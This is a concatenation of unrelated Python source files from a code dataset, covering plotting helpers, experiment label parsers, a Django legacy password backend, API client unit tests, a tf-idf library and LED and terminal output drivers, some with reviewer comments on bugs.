            idx_j += 1
        x += [idx_i]
        y += [idx_j]
        z += [0]
        dx += [l]
        dy += [l]
        dz += [measurement]
        c += [cmap(measurement)]
    ticks = np.arange(0, 2*L, 1)
    axes.set_zlim(0., 1.)
    axes.set_xticks(ticks)
    axes.set_xticklabels(column_names)
    axes.set_yticks(ticks)
    axes.set_yticklabels(column_names)
    axes.set_xlabel('source')
    axes.set_ylabel('target')
    axes.set_zlabel('$P$')
    axes.bar3d(x, y, z, dx, dy, dz, color=c, zsort='max', shade=True, edgecolor='white')
    if url is not None:
        axes.text(-0.75, 2*L+1, 0.0, url, 'y', fontsize=7)
    # Per-view annotations; visibility is toggled below so each saved view
    # shows only the text readable from that camera angle.
    x_txt = axes.text(0, 0, 1.01, '$135^{\circ}$', 'x')
    y_txt = axes.text(0, 2*L-0.2, 1.015, '$45^{\circ}$', 'y')
    x_title = axes.text(2*L, 2*L, 1.2, title, 'y', fontsize=20)
    y_title = axes.text(2*L, 0, 1.25, title, 'x', fontsize=20)
    axes.view_init(elev=45, azim=45)
    if filename is not None:
        x_txt.set_visible(False)
        y_txt.set_visible(True)
        x_title.set_visible(False)
        y_title.set_visible(True)
        fig.savefig(filename + '_45.png', transparent=True, bbox_inches='tight', pad_inches=0)
    axes.view_init(elev=45, azim=135)
    if filename is not None:
        x_txt.set_visible(True)
        y_txt.set_visible(False)
        x_title.set_visible(True)
        y_title.set_visible(False)
        fig.savefig(filename + '_135.png', transparent=True, bbox_inches='tight', pad_inches=0)
def plotExpectations(times, expects, labels, colors, styles, linewidths, title, filename, axvlines=[]):
    """Plot one expectation-value curve per series against time, save to file.

    axvlines: x positions marked with dashed vertical lines.  (The mutable
    default list is safe here -- it is only iterated, never mutated.)
    """
    fig, ax = plt.subplots(1, 1, constrained_layout=True)
    ax.set_title(title)
    ax.set_xlabel('t')
    ax.grid()
    for x in axvlines:
        ax.axvline(x=x, color='black', linestyle='--')
    for measurement, label, color, style, width in zip(expects, labels, colors, styles, linewidths):
        ax.plot(times, measurement, label=label, color=color, linestyle=style, linewidth=width)
    ax.legend()
    fig.savefig(filename, transparent=True)
# from: https://matplotlib.org/stable/gallery/lines_bars_and_markers/barchart.html#sphx-glr-gallery-lines-bars-and-markers-barchart-py
def plotTeleportationOutcomes(outcomes, corrs, labels, title, url=None, filename=None):
    """Grouped bar chart comparing uncorrected vs corrected fidelities."""
    x = np.arange(len(labels))  # the label locations
    width = 0.35  # the width of the bars
    fig, ax = plt.subplots(1, 1, constrained_layout=True)
    rects1 = ax.bar(x - width/2, outcomes, width, label='not corrected')
    rects2 = ax.bar(x + width/2, corrs, width, label='corrected')
    # Add some text for labels, title and custom x-axis tick labels, etc.
    ax.set_ylabel('fidelity')
    ax.set_title(title)
    ax.set_xticks(x)
    ax.set_xticklabels(labels)
    ax.legend()
    ax.bar_label(rects1, padding=3)
    ax.bar_label(rects2, padding=3)
    if url is not None:
        ax.text(0, -0.1, url, fontsize=7)
    # NOTE(review): tight_layout() together with constrained_layout=True is
    # redundant; matplotlib uses only one layout engine and may warn.
    fig.tight_layout()
    if filename is not None:
        fig.savefig(filename, transparent=True)
def plotHbdgSpectrum(L, mus, spectrum, title, mark=None, url=None, url_x=None, url_y=None, filename=None):
    """Plot all 2L spectrum branches (columns of *spectrum*) versus mu.

    mark: optional chemical potential highlighted with a dashed red line.
    NOTE(review): savefig is called unconditionally, so a filename must be
    supplied (unlike the other plot helpers which guard on it).
    """
    fig, ax = plt.subplots(1, 1, constrained_layout=True)
    ax.set_title(title)
    ax.set_xlabel('$\mu$')
    ax.set_ylabel('$E$')
    ax.set_xlim(0., mus[-1])
    for j in range(2*L):
        ax.plot(mus, spectrum[:, j], color='black')
    if mark is not None:
        ax.axvline(x=mark, color='red', linestyle='--')
    if url is not None:
        # Place the attribution text, defaulting to (0.0, -0.1).
        pos_y = -0.1
        if url_y is not None:
            pos_y = url_y
        pos_x = 0.0
        if url_x is not None:
            pos_x = url_x
        ax.text(pos_x, pos_y, url, fontsize=9)
    fig.savefig(filename, transparent=True)
| StarcoderdataPython |
8127751 | <reponame>powerfulbean/StellarWave<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 27 17:57:19 2022
@author: <NAME>
"""
import os
from abc import abstractmethod,ABC
from .. import outsideLibInterfaces as outLib
from ..DataIO import getFileName
from .Cache import CStimuliCache
from ..DataStruct.Abstract import CLabels
from ..DataStruct.StimuliData import CAuditoryStimulus
import datetime
import numpy as np
class CVisualLabels(CLabels):
    """Label parser for visual-experiment log files.

    NOTE(review): ``CTimeIntervalStamp`` is used throughout but never
    imported in this module's visible imports -- confirm where it is defined.
    """

    def stimuliEventParser(self,buffer, stimuliStartTag, StimuliEndTag, i, recordObject):
        """Parse one start/end tag pair starting at buffer[i].

        Fills recordObject.name/startTime/endTime/index and returns the
        tuple (index of the next unread line, recordObject).
        """
        stimuliStart = buffer[i]
        if(stimuliStart[0] == stimuliStartTag):
            temp = stimuliStart[1]
            realName = temp
            recordObject.name = realName
            temp = stimuliStart[2:len(stimuliStart)] # calculate start time
            [h,m,s,ms] = [int(t) for t in temp]
            startTime = datetime.datetime(self.startTime.year,self.startTime.month,self.startTime.day,h,m,s,ms)
            recordObject.startTime = startTime
            i+=1
            stimuliEnd = buffer[i]
            #the audio End Label
            if(stimuliEnd[0] == StimuliEndTag):
                recordObject.index = stimuliEnd[1]
                temp = stimuliEnd[2:len(stimuliEnd)] # calculate end time
                [h,m,s,ms] = [int(t) for t in temp]
                endTime = datetime.datetime(self.startTime.year,self.startTime.month,self.startTime.day,h,m,s,ms)
                recordObject.endTime = endTime
                i+=1
            else:
                print("visuallabels, parser error")
        else:
            print("visuallabels, parser error")
        return i, recordObject

    def readFile(self,fileName, readStimuli = False, stimuliDir = None):
        '''
        read all the necessary information from the label files
        '''
        #include the OutsideLib module for Input/Output
        self.outLibIO = outLib._OutsideLibIO()
        self.description = 'Visual'
        self.type = "Visual"
        buffer = []
        with open(fileName, 'r') as the_file: #opoen the labels file
            lines = the_file.readlines()
            for line in lines: # read the label file
                temp = line.split()
                buffer.append(temp)
        i = 0
        while( i < len(buffer)): #buffer is the whole document
            #the first line, save the start date
            if(i == 0):
                [a,b,c,d,e,f] = [int(j) for j in buffer[i] if (j != '-' and j != ':') ]
                self.startTime = datetime.datetime(a,b,c,d,e,f) # Lib: datetime
                i+=1
            # Session header: which stimulus set this block belongs to.
            if(buffer[i][0] == 'First' or buffer[i][0] == 'Second' or buffer[i][0] == 'Cat' ):
                stimuliIdx = 0
                if(buffer[i][0] == 'First'):
                    stimuliIdx = 1
                elif( buffer[i][0] == 'Second'):
                    stimuliIdx = 2
                elif(buffer[i][0] == 'Cat'):
                    stimuliIdx = 0
                else:
                    stimuliIdx = -1
                i+=1
                # Each 'sub' entry is a triple: crossing, image, rest phase.
                while(buffer[i][0] == 'sub'):
                    tempRecord = CTimeIntervalStamp('','','','') #store crossing time
                    tempRecord2 = CTimeIntervalStamp('','','','') #store stimuli time
                    tempRecord3 = CTimeIntervalStamp('','','','') #store rest time
                    i+=1
                    if(buffer[i][0] == 'attendStart'):
                        i,tempRecord = self.stimuliEventParser(buffer,'attendStart','attendEnd',i,tempRecord)
                    elif(buffer[i][0] == 'unattendStart'):
                        i,tempRecord = self.stimuliEventParser(buffer,'unattendStart','unattendEnd',i,tempRecord)
                    elif(buffer[i][0] == 'crossingStart'):
                        i,tempRecord = self.stimuliEventParser(buffer,'crossingStart','crossingEnd',i,tempRecord)
                    else:
                        raise Exception("don't recognize the type "+ str(buffer[i][0])+' please check the file')
                    i,tempRecord2 = self.stimuliEventParser(buffer,'imageStart','imageEnd',i,tempRecord2)
                    i,tempRecord3 = self.stimuliEventParser(buffer,'restStart','restEnd',i,tempRecord3)
                    # Rest phase is named after the image with an
                    # '_imagination' suffix (extension stripped).
                    tempName,t = os.path.splitext(tempRecord2.name)
                    tempRecord3.name = tempName + '_' + 'imagination'
                    tempRecord.type = 'cross'
                    tempRecord2.type = 'image'
                    tempRecord3.type = 'rest'
                    self.timestamps.append(tempRecord)
                    self.rawdata.append('crossing')
                    self.timestamps.append(tempRecord2)
                    self.rawdata.append(str(stimuliIdx))
                    self.timestamps.append(tempRecord3)
                    self.rawdata.append('rest')
            elif(buffer[i][0]=='-1'):
                # Explicit end-of-file sentinel.
                break
            else:
                # NOTE(review): this branch does not advance ``i``; a
                # malformed line would loop forever printing this error.
                print("visuallabels, readFile error")
        return

    def loadStimuli(self,Folder, extension, oCache : CStimuliCache = None):
        '''
        load stimuli in self.timestamps(CTimeIntervalStamp).stimuli
        '''
        pass
class CBlinksCaliLabels(CLabels):
    """Label parser for blink/eye-movement calibration log files."""

    def readFile(self, fileName):
        """Parse calibration events; each line is a zero-length timestamp."""
        self.outLibIO = outLib._OutsideLibIO()
        tempName= getFileName(fileName)
        self.description = 'BlinksCali_' + tempName
        self.type = "BlinksCali"
        buffer = []
        with open(fileName, 'r') as the_file: #opoen the labels file
            lines = the_file.readlines()
            for line in lines: # read the label file
                temp = line.split()
                buffer.append(temp)
        i = 0
        # Session start time comes from the first line's date + time fields.
        self.startTime = self.parseTimeString(buffer[i][1] + ' ' + buffer[i][2])
        while( i < len(buffer)): #buffer is the whole document
            tempRecord = CTimeIntervalStamp('','','','') #store crossing time
            #the first line, save the start date
            Type = buffer[i][0]
            if(Type == 'blink' or Type == 'lookLeft' or Type == 'lookRight'):
                tempRecord.type = 'cali'
                if(buffer[i][0] == 'blink'):
                    tempRecord.name = 'blink'
                elif(buffer[i][0] == 'lookLeft'):
                    tempRecord.name = 'lookLeft'
                elif(buffer[i][0] == 'lookRight'):
                    tempRecord.name = 'lookRight'
                # Events are instantaneous: start == end.
                time = self.parseTimeString(buffer[i][1] + ' ' + buffer[i][2]).time() #read as datetime and change to time
                tempRecord.startTime = time
                tempRecord.endTime = time
                tempRecord.type = 'cali'
                self.timestamps.append(tempRecord)
                self.rawdata.append(self.description + '_' + Type)
                i += 1
            else:
                # NOTE(review): ``i`` is not advanced here, so an unknown
                # event type makes this loop spin forever.
                print("BlinksCaliLabels, readFile error")
        return

    def parseTimeString(self,string):
        """Parse 'YYYY-MM-DD HH:MM:SS.ffffff' into a datetime object."""
        dateTime = outLib._OutsideLibTime()._importDatetime()
        return dateTime.datetime.strptime(string , '%Y-%m-%d %H:%M:%S.%f')
class CAuditoryLabels(CLabels):
    """Label parser for auditory (dichotic listening) experiment logs."""

    def readFile(self,fileName):
        '''
        read all the necessary information from the label files
        '''
        #include the OutsideLib module for Input/Output
        self.outLibIO = outLib._OutsideLibIO()
        self.description = 'Auditory'
        self.type = "Auditory"
        buffer = []
        datetime = outLib._OutsideLibTime()._importDatetime()
        with open(fileName, 'r') as the_file: #opoen the labels file
            lines = the_file.readlines()
            for line in lines: # read the label file
                temp = line.split()
                buffer.append(temp)
        # print(len(buffer))
        i = 0
        while( i < len(buffer)): #buffer is the whole document
            #the first line, save the start date
            if(i == 0):
                [a,b,c,d,e,f] = [int(j) for j in buffer[i] if (j != '-' and j != ':') ]
                self.startTime = datetime.datetime(a,b,c,d,e,f) # Lib: datetime
                i+=1
            #the left/right label: which ear was attended ('Single' = mono)
            if(buffer[i][0]=='left' or buffer[i][0]=='right' or buffer[i][0] == 'Single'):
                leftflag = ''
                singleflag = False
                if(buffer[i][0] == 'left'):
                    leftflag = True
                elif(buffer[i][0] == 'Single'):
                    singleflag = True
                else:
                    leftflag = False
                tempRecord = CTimeIntervalStamp('','','','')
                tempStimuli = CAuditoryStimulus()
                i += 1
                audioStart = buffer[i]
                #the audio Start Label
                if(audioStart[0] == 'audioStart'):
                    # real audio name
                    temp = audioStart[1]
                    realName, extension = os.path.splitext(temp)
                    if(singleflag == False):
                        # Dichotic file name encodes both streams
                        # ("L<name>R<name>"); split into attended/unattended.
                        stimuliName = self.stimuliname(leftflag, realName)
                        tempStimuli.name = stimuliName
                        #print(stimuliName)
                        otherstimulisName = self.stimuliname(not leftflag, realName)# other stimuli name
                        tempStimuli.otherNames.append(otherstimulisName)
                        #print(otherstimulisName)
                    else:
                        tempStimuli.name = realName
                        tempStimuli.otherNames.append(realName)
                    # calculate start time
                    temp = audioStart[2:len(audioStart)]
                    [h,m,s,ms] = [int(t) for t in temp]
                    startTime = datetime.datetime(self.startTime.year,self.startTime.month,self.startTime.day,h,m,s,ms)
                    tempRecord.startTime = startTime
                    i+=1
                    #the audio End Label
                    audioEnd = buffer[i]
                    if(audioEnd[0] == 'audioEnd'):
                        tempRecord.index = audioEnd[1]
                        temp = audioEnd[2:len(audioEnd)]
                        [h,m,s,ms] = [int(t) for t in temp]
                        endTime = datetime.datetime(self.startTime.year,self.startTime.month,self.startTime.day,h,m,s,ms)
                        tempRecord.endTime = endTime
                        tempRecord.type = 'auditory'
                        self.append(tempRecord,tempStimuli)
                        i+=1
            elif(buffer[i][0]=='-1'):
                # Explicit end-of-file sentinel.
                break
            else:
                raise TypeError("labels, loadfile error", buffer[i][0])
        self.writeType("auditory")
        return buffer

    def stimuliname(self,isLeft, realName):
        """Split an "L<left>R<right>" file name into one stream's name."""
        idx = realName.find('R')
        if(isLeft == True):
            realStimuli = realName[1:idx] # don't include the 'L'
        else:
            realStimuli = realName[idx+1:len(realName)] # don't include the 'R'
        return realStimuli

    def loadStimuli(self,Folder, extension, oCache : CStimuliCache = None):
        '''
        load stimuli in self.timestamps(CTimeIntervalStamp).stimuli
        '''
        if(extension == '.wav'):
            # Load each stimulus pair directly from .wav files on disk.
            for i in range(len(self.timestamps)):
                label = self.rawdata[i]
                mainStreamName = label.name
                otherStreamNames = label.otherNames
                print("AuditoryLabels, readStimuli:", mainStreamName,otherStreamNames[0])
                mainStreamFullPath = Folder + mainStreamName + extension
                # Comprehension variable ``i`` shadows the loop index but
                # does not leak in Python 3 (comprehensions have own scope).
                otherStreamFullPaths = [Folder + i + extension for i in otherStreamNames]
                self.rawdata[i].loadStimulus(mainStreamFullPath,otherStreamFullPaths)
                # save this auditoryStimuli object to the data attribute of this markerRecord object
        elif(extension == 'cache'):
            # Load stimuli from a pre-populated CStimuliCache instead.
            for i in range(len(self.timestamps)):
                label = self.rawdata[i]
                mainStreamName = label.name
                otherStreamNames = label.otherNames
                print("AuditoryLabels, read Stimuli from cache:", mainStreamName,otherStreamNames[0])
                self.rawdata[i].loadStimulus(mainStreamName,otherStreamNames,oCache)
                # save this auditoryStimuli object to the data attribute of this markerRecord object
| StarcoderdataPython |
1745436 | <filename>coffeestats/caffeine/authbackend.py
"""
Custom authentication backend for coffeestats.
"""
from passlib.hash import bcrypt
import logging
from django.utils import timezone
from django.contrib.auth.hashers import make_password
from .models import User
logger = logging.getLogger(__name__)
class LegacyCoffeestatsAuth(object):
    """
    Authentication backend for passwords generated by the original coffeestats
    PHP implementation.

    Users migrated from the PHP app have an empty Django ``password`` and a
    legacy bcrypt hash in ``cryptsum``.  On first successful login the
    password is re-hashed with Django's hasher and the legacy hash cleared.
    """

    def authenticate(self, username=None, password=None):
        """Verify *password* against the legacy bcrypt hash.

        Returns the migrated user on success, otherwise None.  Fix: the
        migration line had been corrupted to ``<PASSWORD>(password)`` (a
        syntax error); the intended call is ``make_password`` which this
        module imports from ``django.contrib.auth.hashers``.
        """
        try:
            user = User.objects.get(username=username)
        except User.DoesNotExist:
            return None
        # Only legacy accounts (no Django password yet) are handled here;
        # regular accounts fall through to Django's default backend.
        if not user.password:
            logger.info(
                'trying to authenticate %s with no password and cryptsum=%s',
                user.username, user.cryptsum)
            if self._check_password(user.cryptsum, password):
                # Migrate: store a Django-native hash, drop the legacy one.
                user.password = make_password(password)
                user.cryptsum = ''
                user.last_login = timezone.now()
                user.save()
                return user
        return None

    def _check_password(self, passwordhash, password):
        """Check *password* against a legacy bcrypt *passwordhash*."""
        return bcrypt.verify(password, passwordhash)

    def get_user(self, user_id):
        """Return the user for *user_id*, or None (Django backend API)."""
        try:
            return User.objects.get(pk=user_id)
        except User.DoesNotExist:
            return None
| StarcoderdataPython |
1959890 | <reponame>telefonicaid/fiware-cosmos-platform<filename>cosmos-cli/cosmos/compute/tests/test_protocol.py
# -*- coding: utf-8 -*-
#
# Copyright (c) 2013-2014 Telefónica Investigación y Desarrollo S.A.U.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import requests
import unittest
from mock import MagicMock, patch
from os import path
import cosmos.common.cosmos_requests as cosmos_requests
from cosmos.common.exceptions import ResponseError
from cosmos.common.tests.util import mock_response
from cosmos.compute.protocol import Protocol
class ProtocolTest(unittest.TestCase):
    """Unit tests for the compute API ``Protocol`` client.

    Each test patches the corresponding ``requests`` verb and checks both
    the URL/body sent and the parsed response, or that ``ResponseError`` is
    raised on HTTP 500.
    """

    def setUp(self):
        self.api_url = 'http://localhost/api/v1'
        self.auth = ('key', 'secret')

    def __create_proto(self):
        # Fresh client per call so tests share no state.
        return Protocol(self.api_url, self.auth)

    def assert_called_once_with(self, mock, *args, **keywords):
        # Wraps Mock.assert_called_once_with, adding the auth tuple and the
        # bundled CA-certificates path that cosmos_requests always passes.
        newkeywords = keywords.copy()
        newkeywords.update({
            'auth': self.auth,
            'verify': path.join(
                path.dirname(path.realpath(cosmos_requests.__file__)),
                'cacerts.pem')})
        mock.assert_called_once_with(*args, **newkeywords)

    @patch('requests.get')
    def test_list_clusters(self, getMock):
        getMock.return_value = mock_response(status_code=200, json={
            'clusters': [
                { 'id': '1', 'name': 'cluster1', 'state': 'ready' },
                { 'id': '2', 'name': 'cluster2', 'state': 'terminated' }
            ]
        })
        rep = self.__create_proto().get_clusters()
        clusters = rep['clusters']
        self.assert_called_once_with(getMock, self.api_url + '/cluster')
        self.assertEquals(len(clusters), 2)
        self.assertEquals(clusters[0]['id'], '1')
        self.assertEquals(clusters[0]['name'], 'cluster1')
        self.assertEquals(clusters[0]['state'], 'ready')
        self.assertEquals(clusters[1]['id'], '2')
        self.assertEquals(clusters[1]['name'], 'cluster2')
        self.assertEquals(clusters[1]['state'], 'terminated')

    @patch('requests.get')
    def test_list_clusters_fail(self, getMock):
        getMock.return_value = mock_response(status_code=500, json={
            'error': 'request failed due to server error'
        })
        with self.assertRaises(ResponseError):
            self.__create_proto().get_clusters()

    @patch('requests.get')
    def test_get_cluster_details(self, getMock):
        getMock.return_value = mock_response(status_code=200, json={
            'id': '1',
            'name': 'cluster1',
            'state': 'ready'
        })
        rep = self.__create_proto().get_cluster_details('1')
        self.assert_called_once_with(getMock, self.api_url + '/cluster/1')
        self.assertEquals(rep['id'], '1')
        self.assertEquals(rep['name'], 'cluster1')
        self.assertEquals(rep['state'], 'ready')

    @patch('requests.get')
    def test_get_cluster_details_fail(self, getMock):
        getMock.return_value = mock_response(status_code=500, json={
            'error': 'request failed due to server error'
        })
        with self.assertRaises(ResponseError):
            self.__create_proto().get_cluster_details('1')

    @patch('requests.post')
    def test_create_cluster(self, postMock):
        postMock.return_value = mock_response(status_code=201, json={
            'id': '1',
            'name': 'cluster1',
            'state': 'ready',
            'shared': False
        })
        rep = self.__create_proto().create_cluster('cluster1', 2, ['FOO'], False)
        # Body is compared as the exact JSON string the client serializes.
        expected_body = json.dumps({ 'name' : 'cluster1', 'size' : 2,
                                     'optionalServices': ['FOO'], 'shared': False })
        self.assert_called_once_with(postMock, self.api_url + '/cluster',
                                     expected_body)
        self.assertEquals(rep['id'], '1')
        self.assertEquals(rep['name'], 'cluster1')
        self.assertEquals(rep['state'], 'ready')
        self.assertEquals(rep['shared'], False)

    @patch('requests.post')
    def test_create_cluster_fail(self, postMock):
        postMock.return_value = mock_response(status_code=500, json={
            'error': 'request failed due to server error'
        })
        with self.assertRaises(ResponseError):
            self.__create_proto().create_cluster('cluster1', 2, ['FOO', 'BAR'], True)

    @patch('requests.post')
    def test_terminate_cluster(self, postMock):
        postMock.return_value = mock_response(status_code=200, json={
            'message': 'termination accepted'
        })
        rep = self.__create_proto().terminate_cluster('1')
        self.assert_called_once_with(postMock,
                                     self.api_url + '/cluster/1/terminate')
        self.assertEquals(rep['message'], 'termination accepted')

    @patch('requests.post')
    def test_terminate_cluster_fail(self, postMock):
        postMock.return_value = mock_response(status_code=500, json={
            'error': 'request failed due to server error'
        })
        with self.assertRaises(ResponseError):
            self.__create_proto().terminate_cluster('1')

    @patch('requests.get')
    def test_list_services(self, getMock):
        result = ['PIG', 'OOZIE']
        getMock.return_value = mock_response(status_code=200,
                                             json=result)
        rep = self.__create_proto().list_services()
        self.assert_called_once_with(getMock, self.api_url + '/services')
        self.assertEquals(rep, result)

    @patch('requests.get')
    def test_list_services_fail(self, getMock):
        # A 404 on the services endpoint degrades to an empty list.
        getMock.return_value = mock_response(status_code=404)
        rep = self.__create_proto().list_services()
        self.assert_called_once_with(getMock, self.api_url + '/services')
        self.assertEquals(rep, [])
| StarcoderdataPython |
8155783 | #!/usr/bin/env python
#
# Copyright 2009 <NAME> (<EMAIL>)
# Reviewed by <NAME>.
#
# This is a simple Tf-idf library. The algorithm is described in
# http://en.wikipedia.org/wiki/Tf-idf
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# Tfidf is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details:
#
# http://www.gnu.org/licenses/lgpl.txt
__author__ = "<NAME>"
__email__ = "<EMAIL>"
import math
import re
from operator import itemgetter
class TfIdf:
    """Tf-idf class implementing http://en.wikipedia.org/wiki/Tf-idf.

    The library constructs an IDF corpus and stopword list either from
    documents specified by the client, or by reading from input files.  It
    computes IDF for a specified term based on the corpus, or generates
    keywords ordered by tf-idf for a specified document.
    """

    def __init__(self, corpus_filename=None, stopword_filename=None,
                 DEFAULT_IDF=1.5):
        """Initialize the idf dictionary.

        If a corpus file is supplied, reads the idf dictionary from it, in the
        format of:
          # of total documents
          term: # of documents containing the term

        If a stopword file is specified, reads the stopword list from it, in
        the format of one stopword per line.

        The DEFAULT_IDF value is returned when a query term is not found in
        the idf corpus.
        """
        self.num_docs = 0
        self.term_num_docs = {}  # term : num_docs_containing_term
        self.stopwords = []
        self.idf_default = DEFAULT_IDF

        if corpus_filename:
            # 'with' guarantees the handle is closed even if parsing fails
            # (the original leaked the open file).
            with open(corpus_filename, "r") as corpus_file:
                # First line holds the total number of documents.
                self.num_docs = int(corpus_file.readline().strip())
                # Each subsequent line is "term: frequency".
                for line in corpus_file:
                    tokens = line.split(":")
                    term = tokens[0].strip()
                    frequency = int(tokens[1].strip())
                    self.term_num_docs[term] = frequency

        if stopword_filename:
            with open(stopword_filename, "r") as stopword_file:
                self.stopwords = [line.strip() for line in stopword_file]

    def get_tokens(self, str):
        """Break a string into tokens, preserving URL tags as an entire token.

        This implementation does not preserve case.
        Clients may wish to override this behavior with their own
        tokenization.  (The parameter name shadows the builtin ``str``; kept
        for backward compatibility with keyword callers.)
        """
        return re.findall(r"<a.*?/a>|<[^\>]*>|[\w'@#]+", str.lower())

    def add_input_document(self, input):
        """Add terms in the specified document to the idf dictionary."""
        self.num_docs += 1
        # Each distinct term counts once per document.
        for word in set(self.get_tokens(input)):
            self.term_num_docs[word] = self.term_num_docs.get(word, 0) + 1
        # (Removed a stray debug print of the token set.)

    def save_corpus_to_file(self, idf_filename, stopword_filename,
                            STOPWORD_PERCENTAGE_THRESHOLD=0.01):
        """Save the idf dictionary and stopword list to the specified files.

        A term is written to the stopword file when it appears in at least
        STOPWORD_PERCENTAGE_THRESHOLD of all documents.
        """
        with open(idf_filename, "w") as output_file:
            output_file.write(str(self.num_docs) + "\n")
            for term, num_docs in self.term_num_docs.items():
                output_file.write(term + ": " + str(num_docs) + "\n")

        sorted_terms = sorted(self.term_num_docs.items(), key=itemgetter(1),
                              reverse=True)
        with open(stopword_filename, "w") as stopword_file:
            for term, num_docs in sorted_terms:
                if num_docs < STOPWORD_PERCENTAGE_THRESHOLD * self.num_docs:
                    break
                stopword_file.write(term + "\n")

    def get_num_docs(self):
        """Return the total number of documents in the IDF corpus."""
        return self.num_docs

    def get_idf(self, term):
        """Retrieve the IDF for the specified term.

        This is computed by taking the logarithm of ((number of documents in
        corpus) divided by (number of documents containing this term)), both
        add-one smoothed.  Stopwords get 0; unknown terms get the default.
        """
        if term in self.stopwords:
            return 0
        if term not in self.term_num_docs:
            return self.idf_default
        return math.log(float(1 + self.get_num_docs()) /
                        (1 + self.term_num_docs[term]))

    def get_doc_keywords(self, curr_doc):
        """Retrieve terms and corresponding tf-idf for the specified document.

        The returned terms are ordered by decreasing tf-idf.
        """
        tfidf = {}
        tokens = self.get_tokens(curr_doc)
        tokens_set = set(tokens)
        for word in tokens_set:
            # tf is normalized by the number of *distinct* tokens.
            mytf = float(tokens.count(word)) / len(tokens_set)
            tfidf[word] = mytf * self.get_idf(word)
        return sorted(tfidf.items(), key=itemgetter(1), reverse=True)
# Demo: build a one-document corpus from the query text, then rank the terms
# of document_tokens1 by tf-idf against it.
document_query = "China has a strong economy that is growing at a rapid pace. However politically it differs greatly from the US Economy."
document_tokens1 = "China has a strong economy that is growing at a rapid pace. However politically it differs greatly from the US Economy."
document_tokens2 = "At last, China seems serious about confronting an endemic problem: domestic violence and corruption."
document_tokens3 = "Japan's prime minister, Shinzo Abe, is working towards healing the economic turmoil in his own country for his view on the future of his people."
document_tokens4 = "<NAME>in is working hard to fix the economy in Russia as the Ruble has tumbled."
document_tokens5 = "What's the future of Abenomics? We asked <NAME> for his views"
document_tokens6 = "Obama has eased sanctions on Cuba while accelerating those against the Russian Economy, even as the Ruble's value falls almost daily."
document_tokens7 = "<NAME> is riding a horse while hunting deer. <NAME> always seems so serious about things - even riding horses. Is he crazy?"
# NOTE(review): 'documents' is built but never added to the corpus -- only
# the query document contributes to the idf statistics below.
documents = [(0, document_tokens1), (1, document_tokens2), (2, document_tokens3), (3, document_tokens4),
             (4, document_tokens5), (5, document_tokens6), (6, document_tokens7)]
tfidf = TfIdf()
tfidf.add_input_document(document_query)
print(tfidf.get_doc_keywords(document_tokens1))
| StarcoderdataPython |
5167295 | from rpi_ws281x import PixelStrip, WS2811_STRIP_RGB
# Matrix: logical width/height of the serpentine LED panel.
WIDTH = 13 + 25
HEIGHT = 8
# LED configuration.
LED_COUNT = WIDTH * HEIGHT  # How many LEDs to light.
LED_DMA_NUM = 10  # DMA channel to use, can be 0-14.
LED_GPIO = 21  # GPIO connected to the LED signal line. Must support PWM!
class LEDs(PixelStrip):
    """WS2811 panel driver for a serpentine-wired WIDTH x HEIGHT matrix.

    Coordinate convention (from set_led): (0, 0) is bottom-left; the strip
    snakes, so every other *physical* row runs right-to-left.
    """

    def __init__(self):
        # TODO: Check if GRB or RGB
        super().__init__(LED_COUNT, LED_GPIO, dma=LED_DMA_NUM, strip_type=WS2811_STRIP_RGB)
        self.begin()

    def set_led(self, x: int, y=None, color=0x000000):
        """Set pixel (x, y) to *color*; with y omitted, x is a linear index."""
        if y is None:
            y = x // WIDTH
            x = x % WIDTH
        # Invert y as 0 is on the bottom.
        y = HEIGHT - y - 1
        # Odd physical rows are wired right-to-left.
        if y % 2 == 1:
            x = WIDTH - x - 1
        self.setPixelColor(x + WIDTH * y, color)

    def get_led(self, x, y):
        """Return the color stored at logical (x, y).

        Bug fix: the original mirrored x *before* inverting y, while set_led
        mirrors *after*; because HEIGHT is even, inversion flips row parity,
        so get_led read back a different physical pixel than set_led wrote.
        Applying the identical transform makes the two exact inverses.
        (Assumes set_led's mapping is the correct one -- confirm on hardware.)
        """
        y = HEIGHT - y - 1
        if y % 2 == 1:
            x = WIDTH - x - 1
        return self.getPixelColor(x + WIDTH * y)
| StarcoderdataPython |
391491 | <filename>Lib/site-packages/prompt_toolkit/output/conemu.py
import sys
assert sys.platform == "win32"
from typing import Any, Optional, TextIO
from prompt_toolkit.data_structures import Size
from .base import Output
from .color_depth import ColorDepth
from .vt100 import Vt100_Output
from .win32 import Win32Output
__all__ = [
"ConEmuOutput",
]
class ConEmuOutput:
    """
    ConEmu (Windows) output abstraction.

    ConEmu is a Windows console application, but it also supports ANSI escape
    sequences. This output class is actually a proxy to both `Win32Output` and
    `Vt100_Output`. It uses `Win32Output` for console sizing and scrolling, but
    all cursor movements and scrolling happens through the `Vt100_Output`.

    This way, we can have 256 colors in ConEmu and Cmder. Rendering will be
    even a little faster as well.

    http://conemu.github.io/
    http://gooseberrycreative.com/cmder/
    """

    def __init__(
        self, stdout: TextIO, default_color_depth: Optional[ColorDepth] = None
    ) -> None:
        self.win32_output = Win32Output(stdout, default_color_depth=default_color_depth)
        self.vt100_output = Vt100_Output(
            stdout, lambda: Size(0, 0), default_color_depth=default_color_depth
        )

    @property
    def responds_to_cpr(self) -> bool:
        # Cursor-position-request is unnecessary on Windows.
        return False

    def __getattr__(self, name: str) -> Any:
        # Console sizing, scrolling and buffer inspection must use the Win32
        # API; everything else (cursor movement, colors) goes out as ANSI
        # escape sequences through the vt100 backend.
        win32_only = frozenset((
            "get_size",
            "get_rows_below_cursor_position",
            "enable_mouse_support",
            "disable_mouse_support",
            "scroll_buffer_to_prompt",
            "get_win32_screen_buffer_info",
            "enable_bracketed_paste",
            "disable_bracketed_paste",
        ))
        delegate = self.win32_output if name in win32_only else self.vt100_output
        return getattr(delegate, name)
Output.register(ConEmuOutput)
| StarcoderdataPython |
